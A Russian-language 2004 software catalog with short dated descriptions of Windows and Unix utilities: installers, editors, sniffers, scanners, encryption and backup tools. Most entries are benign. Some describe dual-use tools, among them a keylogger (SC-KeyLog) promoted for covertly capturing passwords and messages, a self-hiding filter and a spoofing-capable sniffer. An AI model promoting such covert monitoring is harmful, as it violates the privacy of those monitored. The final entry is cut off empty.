25/05/2004 Inno Setup
Программа представляет собой многофункциональный инструмент для создания (ЕХЕ) файлов инсталляции с многоязыковой поддержкой. Программа обладает встроенным мастером для создания файлов инсталляций, с помощью которого вы можете настроить множество различных наиболее используемых параметров. Кроме этого, Inno Setup позволяет определить заданные записи в файлах системного реестра и инициализации, выбрать, будет ли программа автоматически загружаться с запуском операционной системы и добавлять свою пиктограмму в меню "Пуск", а также оснащает каждый дистрибутив системой корректного удаления из системы, существует возможность создания многотомных файлов инсталляций с заданным максимальным размером каждого. Для продвинутых пользователей существует поддержка использования скриптов, написанных на Pascal. На сайте программы доступны ее исходные коды на языке программирования Borland Delphi.
ОС: All Win
Тип программы: Программирование

24/05/2004 Dongle Signatures for IDA
Набор сигнатур функций электронных ключей для дизассемблера IDA.
Содержит:
+ Hardlock
+ Hasp
+ Keylok
+ Sentinel
+ Sentinel SuperPro
+ Wibu
ОС: All Win
Тип программы: Реверсинг

23/05/2004 CleanMOCache
Программа для "заметания следов" пребывания в Интернете, путем очистки кэшей различных Интернет-браузеров (Internet Explorer, Mozilla, Netscape, Firefox и Opera), а так же различных системных кэшей. Программа может быть загружена в резидентном скрытом режиме, и вызываться по заданной в настройке комбинации клавиш. Режим очистки системы может производиться не только вручную, но и автоматически при загрузке системы, закрытии браузера, выходу из системы. Для работы программы необходимо наличие установленного пакета Microsoft .NET 1.1.
ОС: Win XP
Тип программы: HTTP

22/05/2004 Bulk Rename Utility
Утилита для простого и быстрого переименования групп файлов с использованием шаблонов, обладающая следующими функциями:
+ переименование файлов и/или каталогов;
+ удаление или изменение имени;
+ удаление заданных символов, цифр или слов;
+ добавление текста к имени;
+ добавление даты различных форматов(последняя модификация, дата создания, последний доступ к файлу или текущая дата);
+ автоматическая нумерация файлов с использование большого количества опций;
+ предварительный просмотр измененного имени файла;
+ возможность встраивания в Explorer;
+ обработка вложенных папок;
+ и многое другое.
ОС: All Win
Тип программы: Файловые утилиты

21/05/2004 NetWusel IP Subnet Calculator
Небольшая программа, предназначенная для вычисления количества допустимых подсетей и IP адресов в одной сети с заданным IP адресом и маской подсети, а также вычисление маски подсети любого класса по заданному количеству хостов и подсетей. Дополнительной функцией программы является отображение полученных данных в двоичной системе счисления.
ОС: All Win
Тип программы: Сетевые утилиты

20/05/2004 PearPC
Эмулятор архитектуры компьютера Apple PowerPC для x86 платформ. Данный эмулятор позволяет не только запускать ОС (Mandrake Linux, Darwin,MAC OS X и др.) для Apple PowerPC, но также эмулирует и аппаратную часть (процессор, PCI мост, IDE контроллер, контроллер прерываний(PIC), VIA-Cuda, сетевой адаптер, NVRAM, USB, PROM).
ОС: Cross-platform
Тип программы: Прочее

19/05/2004 edtFTPD
FTP сервер, поддерживающий secure FTP (FTPS). Сервер основан на популярном, среди пользователей Unix систем FTP сервере ProFTPD, но в отличие от него оснащен удобной графической оболочкой пользователя и оптимизирован для работы с MS Windows платформами с установленным на них Microsoft .NET версии 1.1.
ОС: Win NT/2k/XP
Тип программы: FTP

18/05/2004 SyncBack
Программа, предназначенная для резервного копирования и синхронизации заданных файлов и папок, обладающая большой гибкостью настроек. Перед непосредственным копированием, программа выясняет, какие файлы были изменены при помощи анализа MD5 сумм, даты последнего изменения и их размера, существует возможность наложение различных фильтров на копируемые файлы, в том числе разрешено использование регулярных выражений. Программа имеет встроенный планировщик задач с большим количеством опций, поддерживает автоматическое архивирование резервной копии и возможность создания резервной копии на удаленном компьютере, используя FTP или расшаренные сетевые ресурсы.
ОС: All Win
Тип программы: Резервное копирование

17/05/2004 SpeedFan
Программа наблюдения за следующими показателями системы: скорость вентиляторов, температура (системы, процессора, видео-карты, жесткого диска и прочих подключенных сенсоров), напряжения в системе. Дополнительными возможностями программы являются:
+ возможность вывода информации о жестких дисках поддерживающих S.M.A.R.T.;
+ изменение FSB на некоторых материнских платах;
+ регулировка скорости вентиляторов, в том числе в автоматическом режиме в зависимости от температур;
+ построение графиков изменения температур (скорости вентиляторов и напряжения) в реальном времени;
+ возможность отображения одного из показателей в системном трее.
ОС: All Win
Тип программы: Железо

16/05/2004 MIMEDefang
Почтовый фильтр, предназначенный для работы с Sendmail. Основные возможности программы:
+ блокировка вирусов;
+ блокировка спама с использованием масок сообщений;
+ удаление HTML вставок;
+ применение различных шаблонов к исходящей почте;
+ удаление или изменение прикрепленных файлов;
+ замена прикрепленных файлов ссылками, перед этим сохранив файл на диске;
+ гибкость настроек, что существенно позволяет увеличить функциональные возможности программы.
ОС: Unix
Тип программы: Почта

15/05/2004 WireNote
Утилита для работы с Заметками/Списком ToDo/Напоминаниями/Адресной книгой и обмена сообщениями по сети (вместо WinPopup например). Программа предназначена для помощи в ежедневной работе за компьютером, раcполагается в трее и не требует к себе излишнего внимания.
* Заметка - небольшое окно, в котором вы можете хранить текстовую информацию. Заметка может быть полупрозрачной, проявляясь только когда вы проводите над ней курсором мыши. Вы можете прикрепить заметку к какому либо окну - в этом случае заметка будет на экране только пока вы работаете с этим приложением.
* ToDo - место хранения ваших идей, созданное ToDo легко доступно из меню в трее или из главного окна, не давая вам забыть о том что необходимо сделать. Напоминания не позволят вам пропустить важную встречу или чей-то день рождения. При срабатывании напоминания WireNote может запустить программу, проиграть звук, выключить компьютер или послать сообщение по сети.
* Сообщения WireNote может быть использован для обмена сообщений по сети LAN, вместо Windows messaging service или WinPopup например. Все сообщения оперируют удобными никами из адресной книги а не именами компьютеров (которые иногда довольно сложно запомнить). WireNote автоматически следит за пользователями из адресной книги -кто в online, а кто нет. При отсылке/приеме сообщений можно использовать один из трех протоколов, можно обмениваться файлами, сообщению может быть назначена спец. иконка (Emotion), так что получивший ее сразу поймет какого рода информация содержится в сообщении еще даже не открывая его. Кроме того вы можете создавать правила фильтрации сообщений, если например вам присылают много ненужной информации.
* Ссылки созданы для удобства доступа к часто используемым ресурсам или для совместного хранения документов вместе относящимися к ним ToDo или заметками.
* Анти-Спам (Удалятель Спама) - Мощный модуль по очистке Ваших почтовых ящиков от спама. Использует файлы спам-строк, совместимые с TheBAT!, с сервера скачиваются только заголовки сообщений, не сообщения целиком (что ускоряет время проверки почты и очень полезно на слабых каналах). Убивает спам прямо на сервере. Полная поддержка различных кодировок почтовых сообщений.
ОС: All Win
Тип программы: Прочее

14/05/2004 Emsa Bandwidth Monitor
Монитор сетевой активности, который отображает следующую информацию: скорость выбранного сетевого интерфейса, количество исходящего/входящего трафика, среднюю скорость соединения и др.. Программа имеет простой и удобный интерфейс, во время работы иконка программы постоянно находится в системном трее, окно программы может быть размещено в любом месте экрана или скрыто вообще, существует возможность сделать окно программы прозрачным. Дополнительной возможностью является отображение подробной информации об используемом сетевом адаптере: скорость соединения, MAC адрес, различные настройки интерфейса, количество посланных/принятых пакетов и многое другое.
ОС: All Win
Тип программы: Мониторинг сети

13/05/2004 Kopete
Интернет-пейджер, поддерживающий множество протоколов, таких как Jabber, ICQ, AIM, MSN, Yahoo, IRC, Windows LANs, GaduGadu и SMS. Программа имеет простой и довольно удобный пользовательский интерфейс. Объединение различных протоколов передачи мгновенных сообщений, позволит вам использовать только один клиент и избавит от необходимости изучать принципы работы нескольких программ, если ваши друзья или коллеги используют различные службы мгновенных сообщений.
ОС: Unix
Тип программы: Чат

12/05/2004 BIEW
HEX редактор и дизассемблер.
+ поддерживает форматы MZ, NE, PE, LE, LX, DOS.SYS, NLM, arch, ELF, a.out, coff32 PharLap, rdoff;
+ понимает русский язык;
+ может работать не только с цельными файлами но и с кусками (дампами);
+ подерживает мышку.
ОС: Cross-platform
Тип программы: Реверсинг

11/05/2004 WinUpdatesList
Маленькая (менее 40Кб) утилита, которая показывает список установленных на вашем компьютере обновлений, сервис паков, "заплаток" для продуктов Microsoft(DirectX, Windows, Media Player и др.). Полученный список можно сохранить в файле text/HTML/XML формата. Кроме этого, при выборе одного из установленных обновлений можно получить список файлов, которые были изменены, а также посетить веб-страницу на сервере Microsoft Web с подробным описанием этого обновления.
ОС: Win 2k/XP
Тип программы: Системные утилиты

10/05/2004 HiAsm
Программа, помогающая упростить рутинную работу, которой иногда приходиться заниматься на компьютере или автоматизировать процесс ее выполнения. Также эту программу можно использовать как планировщик задач, причем планировщик с достаточно мощным набором функций, позволяющим точно и быстро объяснить компьютеру то, что вы от него хотите.
Построение программ производиться при помощи мнемонических схем-диаграмм без единой строчки кода, в удобном редакторе со встроенной справкой. Сейчас возможности приложения позволяют составлять небольшие программки для:
+ работы с Internet и локальной сетью;
+ работы со строками;
+ операциями с файлами;
+ работы с буфером обмена(только текстом);
+ расширения меню Explorer;
+ простой и легкой работы с портом LPT;
+ окнами Windows;
+ выключение компьютера по времени;
+ расширение ф-ций с помощью скриптов;
+ и прочими не столь значительными вещами.
ОС: All Win
Тип программы: Программирование

9/05/2004 Disk ARchive
Программа, позволяющая создавать резервные копии заданных каталогов или файлов с определенными атрибутами на локальном компьютере или на удаленном компьютере используя шлюз. Отличительной особенностью программы является возможность автоматического разбиения созданных архивов на файлы с заданным размером, для последующей их беспрепятственной записи на носители малой емкости: CD, ZIP или дискеты.
ОС: Unix
Тип программы: Резервное копирование

8/05/2004 Password Safe
Маленький (менее 100Кб), простой и удобный менеджер паролей, который позволяет хранить все ваши пароли и/или логины в одной зашифрованной базе данных. Исходная версия этой программы была написана Брюсом Шнайером, автором алгоритма шифрования Blowfish. Программа имеет встроенную функцию генерации паролей. На сайте разработчика можно ознакомиться с исходными кодами программы.
ОС: All Win
Тип программы: Менеджеры паролей

7/05/2004 WebCoder
Универсальный редактор для веб-мастеринга, обладающий следующими возможностями:
+ поддержка HTML, XML, CSS, JS, VBS, PHP, PERL;
+ подсветка синтаксиса;
+ гибкость настроек;
+ панель быстрого просмотра для предварительного просмотра веб-страницы во время ее разработки, панель не требует наличия Microsoft Internet Explorer или каких-нибудь dll, поддерживает весь html, кроме фреймов, css, скриптов и ActiveX;
+ быстрая вставка тегов HTML и спец-символов;
+ поддержка закладок;
+ может выделять текст потоком (как в MS Windows), колонками, строками;
+ конвертор кодировок и опция автоматического выбора кодировки;
+ утилита для определения цвета и защиты e-mail от спамеров;
+ быстрый запуск программ для веб разработки;
+ поддержка многих языков;
+ интеграция с Проводником Windows и поддержка Drag&Drop;
+ многое другое...
ОС: All Win
Тип программы: HTML

6/05/2004 GoAsm
Быстрый и небольшой (230КБ) ассемблер. Максимально упрощенный синтаксис призван облегчить жизнь программисту. Поддерживает инструкции MMX, SSE, SSE2 и 3DNow!. На сайте разработчика есть детальная документация по всем инструкциям и особенностям синтаксиса.
ОС: All Win
Тип программы: Программирование

5/05/2004 W32.Sasser Removal Tool
Утилита для уничтожения всех известных модификаций сетевых червей семейства W32.Sasser(Worm.Win32.Sasser). Червь использует для своего распространения уязвимость в службе LSASS Microsoft Windows. Патч, закрывающий эту уязвимость вы можете загрузить на официальном сайте Microsoft.
ОС: Win NT/2k/XP
Тип программы: Антивирусная защита

4/05/2004 IP->Com
Простенькая утилита, которая позволяет предоставить общий доступ в TCP/IP сетях к любому(нескольким) COM порту(ам) на вашем компьютере. Программа обладает рядом полезных дополнительных функций:
+ произвольный выбор номера TCP порта;
+ авторизация по паролю для удаленного доступа к COM порту;
+ поддержка одновременно нескольких подключений к одному порту;
+ работа через Telnet.
ОС: All Win
Тип программы: Железо

3/05/2004 SplitCam
Программа разделения видеопотока для использования одного источника захвата изображения в нескольких клиентских приложениях. SplitCam позволяет, например, использовать одну подключенную к компьютеру Web-камеру в нескольких программах одновременно, что не позволяют сделать стандартные средства Windows. Благодаря разделению видеопотока от одной камеры SplitCam позволяет подключить к ней до 64 клиентских приложений, при этом каждое приложение будет считать, что работает непосредственно с самой Web-камерой (или с любым другим устройством захвата изображения).
ОС: Win 2k/XP
Тип программы: Прочее

2/05/2004 EtherSnoop
Удобный сниффер, который позволяет фиксировать все пакеты, проходящие в вашей сети в режиме реального времени. Программа имеет простой и понятный интерфейс с легкой навигацией в виде дерева, возможно просматривать содержимое пакетов в hex и текстовом виде, а также применение фильтров на отображение данных. Все данные могут быть сохранены в файл и загружены в программу позднее для более подробного изучения.
ОС: All Win
Тип программы: Мониторинг сети

1/05/2004 WinMerge
Утилита, позволяющая производить визуальное сравнение и последующие слияние текстовых файлов, поддерживаются текстовые форматы DOS, UNIX и MAC. Программа обладает следующими дополнительными функциями:
+ подсветка синтаксиса;
+ сравнение всех файлов заданной директории (с возможной обработкой подкаталогов) или отдельно взятого файла;
+ слияние сравниваемых файлов;
+ встроенный текстовый редактор с многоуровневой системой отмены последнего действия;
Программа будет очень полезна для тех, кому часто приходится сравнивать различные файлы исходников для нахождения в них изменений.
ОС: All Win
Тип программы: Текстовые утилиты

30/04/2004 MailEnable Standard Edition
Почтовый сервер имеющий очень удобную систему администрирования и инсталлируемый как SMTP и POP3 сервис в систему. Система администрирования выполнена в виде MMC приложения, которая позволяет быстро и легко выполнять необходимые функции:
+ загрузка и выгрузка сервисов программы;
+ выполнение диагностики для обнаружения дефектов работы;
+ удаление сообщений за определенный период в заданной области(определенный почтовый ящик, группа пользователей или все почтовые ящики);
+ отправка административных сообщений определенному пользователю или группе пользователей;
+ импорт пользователей зарегистрированных в системе;
+ импорт списков пользователей из CSV файлов;
+ поддержка "черных" списков DNS(Spamhaus, Dorkslayers, Spamcop и др.) с возможностью их редактирования;
+ просмотр и ведение статистики в W3C Extended формате лог-файлов;
+ управление доступом для определенных пользователей, групп или доменов;
+ запрет/ или разрешение доступа с заданного диапазона IP адресов для POP3 и SMTP сервисов;
+ установка различных переадресаций и подключение шлюзов;
+ генерация паролей для создаваемой учетной записи;
+ установка разнообразных квот;
+ POP3 сервис соответствует RFC1939, поддерживает APOP аутентификации;
+ SMTP сервис соответствует RFC821, 974, 1869, 1870, 2554, 2821, позволяет производить проверку PTR записи для соединения, имеет систему аутентификации, а также встроенную систему автоматической блокировки IP адресов при попытке отправки с них большого количества писем в маленький промежуток времени.
ОС: Win NT/2k/XP
Тип программы: Почта

29/04/2004 madCollection
Набор VCL компонентов для Borland Delphi 4-7 и Borland C++ Builder 5-6. Пакет компонентов содержит несколько групп компонентов: madBasic, madExcept, madRemote, madKernel, madCodeHook, madDisAsm, madSecurity, madShell.
Подробное описание групп компонентов, входящих в madCollection:
+ madBasic(процедуры работы со строками и списками, функции архивирования/разархивирования на базе zlib, функции шифровки/дешифровки с использованием алгоритма blowfish, работа с ресурсами exe/dll файлов);
+ madDisAsm(дизассемблер для анализа бинарного кода в заданной точки входа, имеет полную поддержку всех инструкций процессоров Athlon и Pentium 4 включая технологии: 3DNow, SSE и SSE2);
+ madExcept(замена стандартных обработок исключений);
+ madRemote(копирование функций и создание потоков других процессов);
+ madKernel(различные функции по работе с процессами, окнами, иконками панели задач, модулями, потоками, заголовками и прочим);
+ madCodeHook(перехват API функций);
+ madSecurity(эмуляция ACLs и ACEs в Win9x);
+ madShell(функции работы с большинством COM объектов, встроенных в оболочку).
Все группы пакета компонентов являются бесплатными при использовании их в некоммерческих проектах.
ОС: All Win
Тип программы: Программирование

28/04/2004 Dia
Редактор векторной графики хорошо известный большинству пользователей Unix систем, но мало известный пользователям MS Windows, прежде всего ориентированный для построения различного рода диаграмм и схем, является бесплатным аналогом MS Visio. Создание схем и диаграмм в программе сводится к перемещению мышью тех или иных объектов в окно документа, соединению их линиями и вводу комментариев или подписей. Содержащиеся в библиотеке объекты позволяют создавать UML диаграммы, блок-схемы, схемы сетей, логические схемы, простейшие электрические цепи, прочие схемы и диаграммы. Программа поддерживает работу на всех MS Windows системах, но при использовании ее с ОС MS Windows 9x вы можете столкнуться с рядом проблем, которые не встречаются при использовании этой программы на ОС MS Windows 2000/XP.
ОС: Cross-platform
Тип программы: Прочее

27/04/2004 WotWeb
Сканер портов, позволяющий просканировать заданную подсеть на наличие открытых портов различных веб-служб. Результат сканирования может быть сохранен в CSV формате. Программа предназначена для системных администраторов больших сетей, которым необходимо получение статистики о веб-серверах их сети и типе установленного на них веб-сервера. Программа имеет размер менее 30Кб, оснащена простым и понятным графическим интерфейсом пользователя, обладает высокой скоростью сканирования, благодаря использованию нескольких потоков.
ОС: All Win
Тип программы: Сканеры портов

26/04/2004 NetStumbler
Мощный пакетный сниффер, позволяет определять имена, мощность и другие технические характеристики точек доступа стандарта 802.11 b в доступном радиусе действия вашей радиокарты. Программа поддерживает работу с картами на чипсете Hermes, включая Lucent, Avaya, Dell True Mobile, Compaq WL 110, Elsa Airlancer и некоторые другие.
ОС: Win 9x/Me/2k/XP
Тип программы: Беспроводные сети

25/04/2004 Rootkit Hunter
Утилита обнаружения различных хакерских внедрений(руткиты, бэкдуры, LKM's, черви, снифферы, локальные эксплоиты) в Unix системах. Для анализа системы программа использует следующие методы: сравнение MD5 хэша, поиск файлов руткитов, используемых по-умолчанию, анализ ошибок доступа к исполняемым файлам, анализ на наличие подозрительных текстовых строк в LKM и KLD модулях, анализ скрытых файлов, поиск определенного текста в исполняемых файлах. Программе известно около 50 различных хакерских внедрений.
ОС: Unix
Тип программы: Аудит безопасности

24/04/2004 NetworkActiv Web Server
Простой и удобный веб-сервер с графическим интерфейсом, обладающий следующими особенностями:
+ маленький размер дистрибутива;
+ просмотр статистики подключений в режиме реального времени;
+ ограничение доступа к веб-серверу по IP адресу;
+ ограничение доступа с использованием системы авторизации;
+ возможность сохранения статистики в текстовый лог-файл.
Программа может быть использована для создания удаленного доступа к файлам вашего компьютера в локальной сети, маленький размер программы позволяет всегда иметь ее под рукой, записанной на дискету или другой сменный носитель небольшой емкости.
ОС: All Win
Тип программы: HTTP

23/04/2004 Snort
Сетевая система обнаружения вторжения, которая позволяет в реальном времени обнаруживать разнообразные нападения, такие как переполнения буфера, скрытый просмотр портов, CGI нападения, SMB нападение, определение OS и другое. Программа имеет 3 режима работы:
1) пакетный сниффер, похожий на tcpdump(1);
2) ведение статистики проходящих пакетов;
3) полнофункциональная система обнаружения вторжения.
Существует возможность использования встроенного языка условий для применения правил блокировки трафика. Программа поддерживает расширение в виде плагинов, что существенно увеличивает набор функций обработки трафика. При обнаружении нападения программа делает запись в syslog на Unix системах, или отправляет сообщение WinPopup, используя smbclient, в Windows системах.
ОС: Cross-platform
Тип программы: Мониторинг сети

22/04/2004 innounp
Утилита для распаковки файлов инсталляций, созданных при помощи Inno Setup, поддерживаются версии с 3.0.0-beta по 4.2.1. Программа выполнена в виде консольного приложения, что позволяет использовать ее в качестве плагина для FAR Manager'а или Total Commander'а.
ОС: All Win
Тип программы: Реверсинг

21/04/2004 Crypto Anywhere
Программа обеспечивает шифрование сообщений, пересылаемых по электронной почте. В программу встроена функция создания переносного образа, который может быть записан на дискету или любой другой сменный носитель небольшой емкости(USB-брелок, Flash-карту и др.), что позволит иметь эту программу всегда под рукой, для того, чтобы обеспечить себе защищенный «почтовый канал» в любой момент, на любом компьютере, без необходимости предварительной инсталляции дополнительного программного обеспечения. Программа имеет два вида защиты сообщений: самораспаковывающееся и саморасшифровывающееся сообщения (от получателя требуется только ввести пароль) или обычное текстовое сообщение, защищенное шифрованием с открытым ключом (получатель должен будет воспользоваться программой для расшифровки). Алгоритмы Crypto Anywhere основаны на шифровании с открытым ключом RSA, блочном шифровании Twofish и генераторе случайных чисел ISAAC, а также существует поддержка OpenPGP. На сайте разработчика представлена подробная документация на Английском языке.
ОС: All Win
Тип программы: Криптография

20/04/2004 ClocX
Очень оригинальные аналоговые часы, которые благодаря большой коллекции скинов подойдут под любой Рабочий стол. Отличительными особенностями от программ такого типа являются:
+ возможность сделать часы невидимыми для нажатий мыши;
+ функции будильника, которая позволяет запускать программы в заданное время, проигрывать WAV файл или выключить компьютер;
+ задание уровня прозрачности часов;
+ использование разнообразных скинов(на сайте автора можно найти очень большую коллекцию скинов);
+ наличие Русского интерфейса;
+ возможность перетаскивания часов мышкой в любое место на Рабочем столе;
+ настройки сглаживания контуров и хода стрелок;
+ и многое другое.
ОС: All Win
Тип программы: Прочее

19/04/2004 Parental Filter
Очень эффективный фильтр допустимого для просмотра контента веб-страниц на вашем компьютере, предназначенный в первую очередь для запрета просмотра порнографических ресурсов вашими детьми. Блокирование происходит путем анализа текста с загружаемой веб-страницы, содержимого строки адреса или IP-адреса ресурса, все параметры фильтрации содержатся в БД и могут быть изменены. Существует возможность создания редиректа со страниц, запрещенных для просмотра, на сайты из специального списка по случайному выбору. Программа имеет продвинутые функции скрытия собственной установки, такие как удаление из списка процессов, удаление из списка "Установка и удаление программ", защита паролем и др.
ОС: All Win
Тип программы: HTTP

18/04/2004 MySQL Control Center
Клиент администрирования БД MySQL с графическим пользовательским интрфейсом. Данная программа упрощает создание, управление таблицами и базами данных, просмотр содержимого таблиц, редактирование структуры таблиц, оптимизирование, восстанавление и проверку таблиц БД. Программа имеет Русский интерфейс.
ОС: Cross-platform
Тип программы: Базы данных

17/04/2004 Fastream NETFile Server
Комбинированный FTP и веб-сервер, обладающий высокой функциональностью и быстродействием. Основные возможности и преимущества:
+ работа всего программного комплекса(FTP и HTTP) одним процессом;
+ определение дисковой квоты на закачку для FTP/HTTP пользоватлей или групп;
+ поддержка всех стандартных команд FTP/HTTP сервера;
+ полная поддержка протокола передачи FXP(с сервера на сервер);
+ поддержка виртуальных хостов на одном IP адресе;
+ поддержка виртуальной файловой системы (VFS);
+ наложение запрета доступа к серверу с конкретных IP-адресов или IP-адресов принадлежащих тем или иным странам;
+ установка коэффициента U/D для FTP/HTTP;
+ протоколирование обращений к серверу в W3C Extended Log Format'e;
+ динамическое обновление IP для сервиса Dynamic DNS(www.dyndns.org);
+ и многое еще.
Программа бесплатна для персонального использования, но с небольшими ограничениями:
- разрешена регистрация только 5 пользователей на одном сервере;
- количество одновременных подключений не более 6.
ОС: All Win
Тип программы: FTP

16/04/2004 Notepad2
Программа представляет собой хорошую альтернативу встроенному в ОС MS Windows текстовому редактору Блокноту. Данная программа намного шустрее своих аналогов и обладает большим набором всех необходимых функций:
+ подсветка синтаксиса языков программирования: HTML, JavaScript, VBScript, ASP, PHP, CSS, Perl/CGI, C/C++, C#, Java, VB, Pascal, Assembler, SQL, INI, REG, INF, BAT, DIFF;
+ поиск и замена текста с поддержкой регулярных выражений;
+ полезные функции работы со словами(удалить предыдущие/следующие слово и др.), линиями(копировать, переместить и др.) и блоками(объединить линии или разделить на линии);
+ возможность выделения прямоугольной области(Alt+Mouse);
+ увеличение/уменьшение масштаба текста;
+ автоматический отступ;
+ поддержка текстовых файлов следующих форматов: Unicode, UTF-8, Unix и Mac;
+ возможность отображения номеров линий;
+ изменение маркера обозначения конца строки, поддерживает переключение между: Windows(CR+LF),Unix(LF),Mac(CR);
+ обладает очень гибкой системой настроек;
+ и еще очень много разных достоинств.
На сайте автора можно ознакомиться с исходниками этого чудо-редактора.
ОС: All Win
Тип программы: Текстовые утилиты

15/04/2004 CopyLock
Небольшая утилита, но иногда очень необходимая профессиональным пользователям, которая позволяет заменить, переместить, переименовать или удалить файлы, используемые в текущее время каким-либо приложением или системой. После выбора файлов и надлежащих операций необходимо выполнить перезагрузку системы, чтобы изменения вступили в силу. Программа поддерживает возможность работы из командной строки.
ОС: All Win
Тип программы: Файловые утилиты

14/04/2004 DIManager
DesktopIconManager очень полезная утилита, которая сохраняет текущее расположение иконок на Рабочем столе, что позволяет после переустановки системы или смены разрешения на более меньшее вернуться к первоначальному виду. Программа имеет Английский и Немецкий интерфейс, для своей работы не требует установки.
ОС: Win NT/2k/XP
Тип программы: Системные утилиты

13/04/2004 IP Sniffer
Сниффер сети позволяющий получать подробную информация о всех проходящих пакетах по заданному протоколу. Кроме основных возможностей обычного сниффера, имеет возможность фильтрации обрабатываемых данных и декодирование содержимого пакетов, а так же содержит ряд встроенных сетевых утилит:
+ монитор трафика;
+ отображение диаграмм чаще всего используемых IP адресов и протоколов;
+ ARP (просмотр/удаление записей, отправка ответа);
+ получение Netbios имени для заданного IP адреса;
+ Netstat (отображение сетевых подключений с возможностью принудительно завершать выбранные);
+ получение подробной информации о используемом сетевом адаптере;
+ Spoofing (TCP, UDP, ICMP, ARP протоколов);
+ WINS;
+ DNS Query (using win32 DNSAPI);
+ поиск DHCP серверов;
+ служба WhoIs;
+ преобразование IP в Hostname и наоборот;
+ PING (хостов или подсети);
+ сканирование определенного хоста или всей подсети на наличие открытых портов;
и многое другое.
ОС: Win 2k/XP
Тип программы: Мониторинг сети

12/04/2004 AxCrypt
Простая в использовании программа для шифровки данных, которая поддерживает алгоритмы шифрования AES-128 и SHA-1. Программа имеет возможность интеграции в контекстное меню Windows Explorer, что позволяет производить шифровку/дешифровку, сжатие, просмотр/редактирование и удаление несколькими нажатиями мыши. Файлы зашифрованные этой программой имеют расширение .axx. На сайте разработчика можно ознакомиться с исходниками этой программы.
ОС: All Win
Тип программы: Криптография

11/04/2004 Password Construction Kit
Программа для генерации спиcков паролей, которые могут быть сохранены в формате txt, csv, xml, html и др. Программа обладает следующими возможностями:
+ использование при генерации паролей масок или шаблонов;
+ включение в пароль словарных слов;
+ использование в пароле различных комбинаций цифр, букв и символов;
+ генерация WEP ключей (40, 64, 104, 128, 152, 232 и 256 битовых);
+ использование в пароле hexadecimal, decimal, octal или binary строк большой длины;
+ и многое другое.
Программа для своей работы требует Microsoft .NET Framework 1.1.
ОС: All Win
Тип программы: Словари паролей

10/04/2004 Virtual Drive Utility
Простая в использовании утилита для создания виртуального жесткого диска, для того чтобы его создать необходимо выбрать букву будущего жесткого диска и указать папку, которой он будет соответствовать.
ОС: All Win
Тип программы: Дисковые утилиты

9/04/2004 Fidolook HL
Расширение для Microsoft Outlook Express, которое позволяет увеличить производительность данного продукта, путем добавления следующих возможностей:
+ использование шаблонов и масок сообщений;
+ расширенные методы цитирования сообщений;
+ добавление подписей в конце сообщений;
+ расширенная обработка заголовков;
+ импорт и экспорт сообщений;
+ добавление горячих клавиш для использования тех или иных функций;
+ расширенные возможности работы с новостными группами.
Кроме этого, не мало важной особенностью является мультиязыковая поддержка и наличие русского интерфейса.
ОС: All Win
Тип программы: Почта

8/04/2004 SC-KeyLog
Программа ведет журнал нажатия клавиш и хранит его в зашированном виде, есть возможность удаленного просмотра журнала или отправка его в виде сообщения по электронной почте. Данная программа позволит вам отследить, все действия, которые происходят на компьютере в моменты вашего отсутствия. Программа позволяет фиксировать тексты любых типов сообщений электронной почты, сообщений интернет-пейджеров MSN, ICQ, AIM и др., изменения в текстовых файлах, информацию вводимую на веб-страницах, пароли и многое другое.
ОС: All Win
Тип программы: Мониторинг системы

7/04/2004 NRG Tools
Многофункциональный сетевой сканер, предназначенный для исследования защищенности веб-сервера, при помощи сканирования с использованием базы уязвимостей. Поддерживает передачу данных по протоколу HTTP 0.9/1.0/1.1. В NRG Tools встроен сканер портов, определитель DNS по заданному IP адресу и наоборот, а также сканер e-mail адресов на заданном сайте.
ОС: All Win
Тип программы: Сканеры уязвимостей

6/04/2004 IISPassword
Програма облегчает создание запароленных папок веб-сайтов на Microsoft IIS веб-сервере. Основные возможности программы:
+ защита паролем без создания пользователя в системе;
+ совместимость с файлом htaccess из Apache;
+ полная интеграция с Microsoft IIS;
+ поддержка работы из консоли;
+ простой и мощный механизм защиты.
Поддерживает работу с Microsoft IIS 5/5.1/6.
ОС: Win 2k/XP
Тип программы: HTTP

5/04/2004 FastNet99
Ускоритель Интернета, который позволяет увеличить скорость доступа к сайтам на несколько секунд, путем добавления IP адресов наиболее используемых сайтов в файл hosts. Для профессиональных пользователей, кроме этой малозначительной функции существует ряд встроенных сетевых утилит: Ping, TraceRoute, WhoIs, Finger, порт-сканер, E-mail checker, IP Inspector, менеджер cookies и другие.
ОС: All Win
Тип программы: Сетевые утилиты

4/04/2004 UltraShredder
Утилита, для экстренной ликвидации файлов без какой-либо возможности их последующего восстановления, путем перезаписи существующих файлов случайными данными около 100 раз с постоянным сохранением результатов перезаписи.
ОС: All Win
Тип программы: Уничтожение данных

3/04/2004 RelayTCP
Программа, которая позволяет переадресовывать TCP/IP подключения к локальному порту на удаленный адрес(IP и порт) с регистрацией всех подключений и переданных данных. Существует две версии программы: для работы из командной строки(создает только один шлюз) и работы как NT сервиса(возможно создание нескольких шлюзов).
ОС: All Win
Тип программы: Туннелирование

2/04/2004 Bigle 3D
Программа, позволяющая создавать стереограммы без особых усилий, полученное изображение может быть сохранено в любой из графических форматов: BMP, PNG, TIFF.
Стереограмма или магический глаз - один из видов современного искуcства, использующий новейшие разработки в области компьютерной графики и технологий, создающий иллюзию объема на основе двухмерного рисунка. Cкрытое изображение нельзя заметить, если смотреть на картинку обычным образом. Подробнее о стереограммах здесь.
ОС: All Win
Тип программы: Прочее

1/04/2004 Outlook Express Freebie Backup
Программа для сохранения настроек почтового клиента MS Outlook Express 4/5/6 для последующего их восстановления. Программа обладает следующими возможностями:
+ сохранение/восстановление настроек нажатием одной кнопки;
+ автоматическое определение места нахождения архивов сообщений(DBX файлов) и Адресной книги;
+ встроенный поиск файлов: DBX, IDX, MBX, WAB и WA~, которые использует Outlook Express;
+ генерация отчета об идентификаторах и файлах в текстовом и HTML формате;
+ сохранение и восстановление файлов Адресной книги;
+ сохранение и восстановление DBX, IDX, MBX файлов;
+ сохранение и восстановление записей реестра;
+ сохранение и восстановление установок фильтров;
+ изменение {USER_ID} в файле реестра на любой другой;
+ изменение имени пользователя для идентификатора;
+ создание нового идентификатора;
+ создание копии идентификатора;
+ удаление идентификатора;
и многое другое.
ОС: All Win
Тип программы: Восстановление информации

31/03/2004 Speed Up Alarm
Утилита, представляющая из себя будильник, который проиграет заданную мелодию в формате MIDI, WAV, MP3 и/или покажет текстовое сообщение в определенное время.
ОС: All Win
Тип программы: Прочее

30/03/2004 IPNetMon
